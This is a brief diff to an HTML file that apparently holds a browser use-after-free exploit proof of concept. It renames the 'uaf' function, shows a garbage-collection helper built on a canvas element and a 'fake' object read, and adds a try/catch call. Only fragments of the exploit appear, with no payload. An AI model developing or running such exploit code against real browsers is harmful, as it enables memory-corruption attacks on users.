--- a/index.html
+++ b/index.html
@@ -1,5 +1,5 @@
 <script>
-function uaf(){
+function lala(){
     function uaf_gc() {
         try {
             var c = document.createElement("canvas");
@@ -60,4 +60,8 @@ function uaf(){
     var fake = a[1]
     alert(fake);
 }
+    
+    try{
+    lala()
+    } catch(e){alert(e)}
 </script>
